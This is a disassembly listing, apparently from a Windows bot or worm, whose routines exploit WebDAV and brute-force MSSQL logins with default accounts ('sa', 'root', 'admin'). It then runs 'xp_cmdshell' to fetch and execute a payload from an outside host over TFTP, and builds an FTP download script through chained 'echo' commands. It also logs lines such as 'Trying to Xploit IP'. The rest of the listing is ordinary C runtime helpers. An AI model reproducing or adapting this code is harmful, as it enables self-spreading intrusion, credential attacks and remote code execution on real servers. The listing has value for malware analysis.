push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
push edi
push 68h
push offset dword_42C2B8
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
push edi
push 0A0h
push offset dword_42C328
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
cmp dword ptr [ebp-10h], 1
jz short loc_4125B1
cmp dword ptr [ebp-10h], 2
jz short loc_4125B1
push 1Fh
pop ecx
mov esi, offset dword_42C3D0
lea edi, [ebp-2884h]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp-12C4h]
lea edi, [ebp-2808h]
rep movsd
pop ecx
push 0
push 0CF8h
lea eax, [ebp-2884h]
mov esi, offset off_42C450
lea edi, [ebp-2038h]
push eax
push dword ptr [ebp-8]
rep movsd
and byte ptr [ebp-1B8Dh], 0
loc_41259A: ; CODE XREF: .text:0041264B�j
call dword_433534
cmp eax, 0FFFFFFFFh
jnz loc_412650
loc_4125A9: ; CODE XREF: .text:00412674�j
push dword ptr [ebp-8]
jmp loc_412731
; ---------------------------------------------------------------------------
loc_4125B1: ; CODE XREF: .text:00412547�j
; .text:0041254D�j
push 1Ah
pop ecx
mov esi, offset dword_42C4E8
lea edi, [ebp-8590h]
rep movsd
mov ecx, 6D6h
lea esi, [ebp-43E0h]
lea edi, [ebp-8528h]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42C558
lea edi, [ebp-64B8h]
rep movsd
mov ecx, 297h
lea esi, [ebp-334Ch]
lea edi, [ebp-6448h]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42C5D0
lea edi, [ebp-5984h]
rep movsd
mov esi, [ebp-8]
xor edi, edi
push edi
push 10FCh
lea eax, [ebp-8590h]
push eax
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
push edi
push 0FDCh
lea eax, [ebp-64B8h]
push eax
push esi
jmp loc_41259A
; ---------------------------------------------------------------------------
loc_412650: ; CODE XREF: .text:004125A3�j
push 0
push ebx
lea eax, [ebp-0AF0h]
push eax
push dword ptr [ebp-8]
call dword_433414
push 6
push 1
push 2
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_4125A9
xor eax, eax
lea edi, [ebp-20h]
stosd
stosd
stosd
stosd
push 135h
mov word ptr [ebp-20h], 2
call dword_4335EC
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_433514
mov [ebp-1Ch], eax
push 10h
lea eax, [ebp-20h]
push eax
push esi
call dword_433458
cmp eax, 0FFFFFFFFh
jnz short loc_4126BC
push dword ptr [ebp-8]
jmp short loc_41272A
; ---------------------------------------------------------------------------
loc_4126BC: ; CODE XREF: .text:004126B5�j
xor edi, edi
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
test eax, eax
jle short loc_412737
push 1F4h
call ds:dword_41F000
push dword ptr [ebp+9Ch]
lea eax, [ebp+1Ch]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
lea eax, [ebp-2B0h]
push 190h
push eax
call sub_412E0D
lea eax, [ebp-2B0h]
add esp, 14h
lea edx, [eax+1]
loc_412709: ; CODE XREF: .text:0041270E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412709
push edi
sub eax, edx
push eax
lea eax, [ebp-2B0h]
push eax
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_41273E
loc_41272A: ; CODE XREF: .text:004126BA�j
call dword_4335AC
loc_412730: ; CODE XREF: .text:00412432�j
; .text:0041244D�j ...
push esi
loc_412731: ; CODE XREF: .text:004125AC�j
call dword_4335AC
loc_412737: ; CODE XREF: .text:0041217B�j
; .text:00412184�j ...
xor eax, eax
loc_412739: ; CODE XREF: .text:004123F2�j
; .text:004127C0�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41273E: ; CODE XREF: .text:00412728�j
call dword_4335AC
push esi
call dword_4335AC
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSTryingToXploi ; "[%s]: Trying to Xploit IP: %s."
lea eax, [ebp-4B0h]
push 200h
push eax
call sub_412E0D
add esp, 14h
cmp [ebp+140h], edi
jnz short loc_41279F
push edi
push dword ptr [ebp+13Ch]
lea eax, [ebp-4B0h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
add esp, 14h
loc_41279F: ; CODE XREF: .text:0041277D�j
lea eax, [ebp-4B0h]
push eax
call sub_401C33
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42A070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp loc_412739
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0E30h
push ebx
xor ebx, ebx
lea eax, [ebp-14h]
push eax
push ebx
push 1
mov [ebp-1], bl
mov dword ptr [ebp-30h], offset aSa ; "sa"
mov dword ptr [ebp-2Ch], offset aRoot ; "root"
mov dword ptr [ebp-28h], offset aAdmin ; "admin"
mov [ebp-24h], ebx
mov [ebp-1Ch], ebx
mov [ebp-0Ch], ebx
mov [ebp-10h], ebx
call dword_4334C4
test ax, ax
jnz short loc_41281E
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-14h]
call dword_43345C
test ax, ax
jz short loc_412825
loc_41281E: ; CODE XREF: .text:00412805�j
xor eax, eax
jmp loc_412A73
; ---------------------------------------------------------------------------
loc_412825: ; CODE XREF: .text:0041281C�j
push esi
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-14h]
push 2
call dword_4334C4
test ax, ax
jz short loc_412841
xor esi, esi
jmp loc_412A65
; ---------------------------------------------------------------------------
loc_412841: ; CODE XREF: .text:00412838�j
lea eax, [ebp-30h]
push edi
mov edi, ds:dword_41F000
mov [ebp-8], eax
loc_41284E: ; CODE XREF: .text:00412A53�j
cmp dword_42B050, ebx
mov [ebp-18h], ebx
jz loc_412A42
mov eax, offset dword_42B050
mov esi, eax
loc_412864: ; CODE XREF: .text:004128DE�j
lea ecx, [ebp-1]
push ecx
push dword ptr [eax]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
push eax
lea eax, [ebp-0A30h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_412BB5
lea eax, [ebp-0A30h]
add esp, 1Ch
lea ecx, [eax+1]
loc_412896: ; CODE XREF: .text:0041289B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_412896
push ebx
sub eax, ecx
lea ecx, [ebp-20h]
push ecx
push 400h
lea ecx, [ebp-0E30h]
push ecx
push eax
lea eax, [ebp-0A30h]
push eax
push ebx
push dword ptr [ebp-0Ch]
call dword_43358C
cmp ax, bx
jz short loc_4128E5
cmp ax, 1
jz short loc_4128E5
push 1F4h
call edi
inc dword ptr [ebp-18h]
add esi, 4
cmp [esi], ebx
mov eax, esi
jnz short loc_412864
jmp loc_412A42
; ---------------------------------------------------------------------------
loc_4128E5: ; CODE XREF: .text:004128C5�j
; .text:004128CB�j
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-0Ch]
push 3
call dword_4334C4
mov esi, offset byte_42AED0
push esi
push dword ptr [ebp+8]
call sub_406C33
pop ecx
push eax
lea eax, [ebp-630h]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_412BB5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_4335A4
test ax, ax
jz loc_412A2E
push 1388h
call edi
push esi
lea eax, [ebp-630h]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell '%s'"
push eax
call sub_412BB5
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-230h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_412BB5
add esp, 18h
xor esi, esi
loc_412966: ; CODE XREF: .text:00412999�j
lea eax, [ebp-230h]
push eax
call sub_401D13
test eax, eax
pop ecx
jz short loc_41298E
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_4335A4
test ax, ax
jz short loc_4129A0
loc_41298E: ; CODE XREF: .text:00412975�j
push 1388h
call edi
inc esi
cmp esi, 6
jl short loc_412966
jmp loc_412A2E
; ---------------------------------------------------------------------------
loc_4129A0: ; CODE XREF: .text:0041298C�j
mov eax, [ebp-18h]
push dword_42B050[eax*4]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
mov dword ptr [ebp-1Ch], 1
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: (%s:%d) User: (%s/"...
lea eax, [ebp-230h]
push 200h
push eax
call sub_412E0D
add esp, 20h
cmp [ebp+140h], ebx
jnz short loc_412A10
push ebx
push dword ptr [ebp+13Ch]
lea eax, [ebp-230h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
add esp, 14h
loc_412A10: ; CODE XREF: .text:004129EE�j
lea eax, [ebp-230h]
push eax
call sub_401C33
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42A070[eax]
inc dword ptr [eax]
pop ecx
loc_412A2E: ; CODE XREF: .text:0041292D�j
; .text:0041299B�j
push dword ptr [ebp-0Ch]
call dword_433468
push dword ptr [ebp-10h]
push 3
call dword_433550
loc_412A42: ; CODE XREF: .text:00412857�j
; .text:004128E0�j
mov esi, [ebp-1Ch]
cmp esi, 1
jz short loc_412A59
add dword ptr [ebp-8], 4
mov eax, [ebp-8]
cmp [eax], ebx
jnz loc_41284E
loc_412A59: ; CODE XREF: .text:00412A48�j
push dword ptr [ebp-0Ch]
push 2
call dword_433550
pop edi
loc_412A65: ; CODE XREF: .text:0041283C�j
push dword ptr [ebp-14h]
push 1
call dword_433550
mov eax, esi
pop esi
loc_412A73: ; CODE XREF: .text:00412820�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412A80 proc near ; CODE XREF: sub_401000+5C�p
; sub_401000+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_412B44
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_412AAC
loc_412A9B: ; CODE XREF: sub_412A80+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_412ADD
test edi, 3
jnz short loc_412A9B
loc_412AAC: ; CODE XREF: sub_412A80+19�j
; sub_412A80+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_412AAC
mov eax, [edi-4]
test al, al
jz short loc_412AEC
test ah, ah
jz short loc_412AE7
test eax, 0FF0000h
jz short loc_412AE2
test eax, 0FF000000h
jnz short loc_412AAC
loc_412ADD: ; CODE XREF: sub_412A80+22�j
sub edi, 1
jmp short loc_412AEF
; ---------------------------------------------------------------------------
loc_412AE2: ; CODE XREF: sub_412A80+54�j
sub edi, 2
jmp short loc_412AEF
; ---------------------------------------------------------------------------
loc_412AE7: ; CODE XREF: sub_412A80+4D�j
sub edi, 3
jmp short loc_412AEF
; ---------------------------------------------------------------------------
loc_412AEC: ; CODE XREF: sub_412A80+49�j
sub edi, 4
loc_412AEF: ; CODE XREF: sub_412A80+60�j
; sub_412A80+65�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_412B04
mov ebx, ecx
shr ecx, 2
jnz short loc_412B5E
jmp short loc_412B26
; ---------------------------------------------------------------------------
loc_412B04: ; CODE XREF: sub_412A80+79�j
; sub_412A80+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_412B4A
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_412B40
test esi, 3
jnz short loc_412B04
mov ebx, ecx
shr ecx, 2
jnz short loc_412B5E
loc_412B26: ; CODE XREF: sub_412A80+82�j
; sub_412A80+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_412B40
loc_412B2D: ; CODE XREF: sub_412A80+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_412B42
sub ecx, 1
jnz short loc_412B2D
loc_412B40: ; CODE XREF: sub_412A80+95�j
; sub_412A80+AB�j
mov [edi], cl
loc_412B42: ; CODE XREF: sub_412A80+B9�j
pop ebx
pop esi
loc_412B44: ; CODE XREF: sub_412A80+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_412B4A: ; CODE XREF: sub_412A80+8B�j
; sub_412A80+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412B54: ; CODE XREF: sub_412A80+F6�j
; sub_412A80+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_412B26
loc_412B5E: ; CODE XREF: sub_412A80+80�j
; sub_412A80+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_412B54
test dl, dl
jz short loc_412B4A
test dh, dh
jz short loc_412BAA
test edx, 0FF0000h
jz short loc_412B9A
test edx, 0FF000000h
jnz short loc_412B54
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412B9A: ; CODE XREF: sub_412A80+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412BAA: ; CODE XREF: sub_412A80+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_412A80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BB5 proc near ; CODE XREF: sub_401000+19�p
; sub_401000+48�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_414CA3
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_412C07
dec [ebp+var_1C]
js short loc_412BFA
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_412C07
; ---------------------------------------------------------------------------
loc_412BFA: ; CODE XREF: sub_412BB5+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_414AFC
pop ecx
pop ecx
loc_412C07: ; CODE XREF: sub_412BB5+36�j
; sub_412BB5+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_412BB5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C10 proc near ; CODE XREF: sub_401141+2CF�p
; sub_4078FA+3B62�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_412C37
xor eax, eax
jmp short loc_412C39
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412C10+21�j
mov eax, edi
loc_412C39: ; CODE XREF: sub_412C10+25�j
cld
pop edi
leave
retn
sub_412C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412C40 proc near ; CODE XREF: sub_401141+6E�p
; sub_401141+A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_412CDF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_412C6C
shr ecx, 2
jnz loc_412CEF
jmp short loc_412C93
; ---------------------------------------------------------------------------
loc_412C6C: ; CODE XREF: sub_412C40+1F�j
; sub_412C40+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_412CA6
test al, al
jz short loc_412CAE
test esi, 3
jnz short loc_412C6C
mov ebx, ecx
shr ecx, 2
jnz short loc_412CEF
loc_412C8E: ; CODE XREF: sub_412C40+AD�j
and ebx, 3
jz short loc_412CA6
loc_412C93: ; CODE XREF: sub_412C40+2A�j
; sub_412C40+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_412CD8
sub ebx, 1
jnz short loc_412C93
loc_412CA6: ; CODE XREF: sub_412C40+39�j
; sub_412C40+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412CAE: ; CODE XREF: sub_412C40+3D�j
test edi, 3
jz short loc_412CCC
loc_412CB6: ; CODE XREF: sub_412C40+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_412D5C
test edi, 3
jnz short loc_412CB6
loc_412CCC: ; CODE XREF: sub_412C40+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_412D47
loc_412CD3: ; CODE XREF: sub_412C40+9B�j
; sub_412C40+116�j
mov [edi], al
add edi, 1
loc_412CD8: ; CODE XREF: sub_412C40+5F�j
sub ebx, 1
jnz short loc_412CD3
pop ebx
pop esi
loc_412CDF: ; CODE XREF: sub_412C40+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_412CE5: ; CODE XREF: sub_412C40+C7�j
; sub_412C40+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_412C8E
loc_412CEF: ; CODE XREF: sub_412C40+24�j
; sub_412C40+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_412CE5
test dl, dl
jz short loc_412D39
test dh, dh
jz short loc_412D2F
test edx, 0FF0000h
jz short loc_412D25
test edx, 0FF000000h
jnz short loc_412CE5
mov [edi], edx
jmp short loc_412D3D
; ---------------------------------------------------------------------------
loc_412D25: ; CODE XREF: sub_412C40+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_412D3D
; ---------------------------------------------------------------------------
loc_412D2F: ; CODE XREF: sub_412C40+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_412D3D
; ---------------------------------------------------------------------------
loc_412D39: ; CODE XREF: sub_412C40+CB�j
xor edx, edx
mov [edi], edx
loc_412D3D: ; CODE XREF: sub_412C40+E3�j
; sub_412C40+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_412D53
loc_412D47: ; CODE XREF: sub_412C40+91�j
xor eax, eax
loc_412D49: ; CODE XREF: sub_412C40+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_412D49
loc_412D53: ; CODE XREF: sub_412C40+105�j
and ebx, 3
jnz loc_412CD3
loc_412D5C: ; CODE XREF: sub_412C40+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_412C40 endp
; =============== S U B R O U T I N E =======================================
sub_412D64 proc near ; CODE XREF: sub_40169B+39�p
; sub_402B1D+56�p ...
arg_0 = dword ptr 4
call sub_415456
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_412D64 endp
; =============== S U B R O U T I N E =======================================
sub_412D71 proc near ; CODE XREF: sub_401525+57�p
; sub_401525:loc_401588�p ...
call sub_415456
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_412D71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D93 proc near ; CODE XREF: sub_401525+4A�p
; sub_402B1D+23C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_416000
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_41554C
add esp, 10h
leave
retn
sub_412D93 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412DD0 proc near ; CODE XREF: sub_4028A8+8�p
; sub_4039DE+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_412DE5
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_412DE5: ; CODE XREF: sub_412DD0+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_412DEA: ; CODE XREF: sub_412DD0+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_412DEA
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_412DD0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E0D proc near ; CODE XREF: sub_401BBB+46�p
; sub_401C33+67�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_414CA3
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_412E5E
dec [ebp+var_1C]
js short loc_412E51
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_412E5E
; ---------------------------------------------------------------------------
loc_412E51: ; CODE XREF: sub_412E0D+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_414AFC
pop ecx
pop ecx
loc_412E5E: ; CODE XREF: sub_412E0D+35�j
; sub_412E0D+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_412E0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E64 proc near ; CODE XREF: sub_401CA7+19�p
; sub_404592+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_414CA3
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_412EB4
dec [ebp+var_1C]
js short loc_412EA7
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_412EB4
; ---------------------------------------------------------------------------
loc_412EA7: ; CODE XREF: sub_412E64+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_414AFC
pop ecx
pop ecx
loc_412EB4: ; CODE XREF: sub_412E64+34�j
; sub_412E64+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_412E64 endp
; =============== S U B R O U T I N E =======================================
sub_412EBA proc near ; CODE XREF: sub_412F42�j
; sub_41CB47+36�p
arg_0 = dword ptr 4
push esi
push edi
call sub_415456
mov edi, [eax+64h]
cmp edi, off_42C7BC
jz short loc_412ED3
call sub_41628E
mov edi, eax
loc_412ED3: ; CODE XREF: sub_412EBA+10�j
mov esi, [esp+8+arg_0]
loc_412ED7: ; CODE XREF: sub_412EBA+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_412EEE
push 8
push eax
push edi
call sub_41608B
add esp, 0Ch
jmp short loc_412EF8
; ---------------------------------------------------------------------------
loc_412EEE: ; CODE XREF: sub_412EBA+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_412EF8: ; CODE XREF: sub_412EBA+32�j
test eax, eax
jz short loc_412EFF
inc esi
jmp short loc_412ED7
; ---------------------------------------------------------------------------
loc_412EFF: ; CODE XREF: sub_412EBA+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_412F0F
cmp ecx, 2Bh
jnz short loc_412F13
loc_412F0F: ; CODE XREF: sub_412EBA+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_412F13: ; CODE XREF: sub_412EBA+53�j
xor eax, eax
loc_412F15: ; CODE XREF: sub_412EBA+7C�j
cmp ecx, 30h
jl short loc_412F24
cmp ecx, 39h
jg short loc_412F24
sub ecx, 30h
jmp short loc_412F27
; ---------------------------------------------------------------------------
loc_412F24: ; CODE XREF: sub_412EBA+5E�j
; sub_412EBA+63�j
or ecx, 0FFFFFFFFh
loc_412F27: ; CODE XREF: sub_412EBA+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_412F38
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_412F15
; ---------------------------------------------------------------------------
loc_412F38: ; CODE XREF: sub_412EBA+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_412F41
neg eax
locret_412F41: ; CODE XREF: sub_412EBA+83�j
retn
sub_412EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_412F42 proc near ; CODE XREF: sub_401D45+63�p
; sub_402B1D+3FE�p ...
jmp sub_412EBA
sub_412F42 endp
; =============== S U B R O U T I N E =======================================
sub_412F47 proc near ; CODE XREF: sub_412F93+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
loc_412F4D: ; DATA XREF: .rdata:off_4271AC�o
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_412F8A
push esi
call sub_41644D
push esi
mov edi, eax
call sub_416422
push dword ptr [esi+10h]
call sub_416387
add esp, 0Ch
test eax, eax
jge short loc_412F78
or edi, 0FFFFFFFFh
jmp short loc_412F8A
; ---------------------------------------------------------------------------
loc_412F78: ; CODE XREF: sub_412F47+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_412F8A
push eax
call sub_412FE4
and dword ptr [esi+1Ch], 0
pop ecx
loc_412F8A: ; CODE XREF: sub_412F47+D�j
; sub_412F47+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_412F47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F93 proc near ; CODE XREF: sub_402A8B+74�p
; sub_4078FA+3443�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_4276F0
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_412FB9
and dword ptr [esi+0Ch], 0
loc_412FB0: ; CODE XREF: sub_412F93+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_412FB9: ; CODE XREF: sub_412F93+17�j
push esi
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_412F47
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_412FDC
jmp short loc_412FB0
sub_412F93 endp
; =============== S U B R O U T I N E =======================================
sub_412FD9 proc near ; DATA XREF: .rdata:stru_4276F0�o
mov esi, [ebp+8]
sub_412FD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412FDC proc near ; CODE XREF: sub_412F93+3F�p
push esi
call sub_4166C5
pop ecx
retn
sub_412FDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
